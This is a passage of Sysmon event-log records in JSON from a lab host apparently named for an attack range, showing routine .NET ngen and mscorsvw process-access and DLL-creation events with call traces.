C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.554","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00108BF41000}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00108BF41000}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00108BF41000}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-00108BF41000}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-00108BF41000}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:24.584\r\nProcessGuid: {41C8662E-22BC-5F25-0000-00108BF41000}\r\nProcessId: 4336\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f0-0\\System.Xml.Serialization.dll\r\nCreationUtcTime: 2020-08-01 08:07:24.584","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:24.584","ProcessGuid":"{41C8662E-22BC-5F25-0000-00108BF41000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10f0-0\\System.Xml.Serialization.dll","CreationUtcTime":"2020-08-01 08:07:24.584","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.615\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010A7F71000}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.615","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010A7F71000}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.615\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010A7F71000}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.615","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010A7F71000}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8265,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.615\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BC-5F25-0000-0010A7F71000}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.615","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BC-5F25-0000-0010A7F71000}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8266,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.647\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00106AB00F00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.647","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00106AB00F00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8267,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:24.647\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-00106AB00F00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:24.647","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-00106AB00F00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
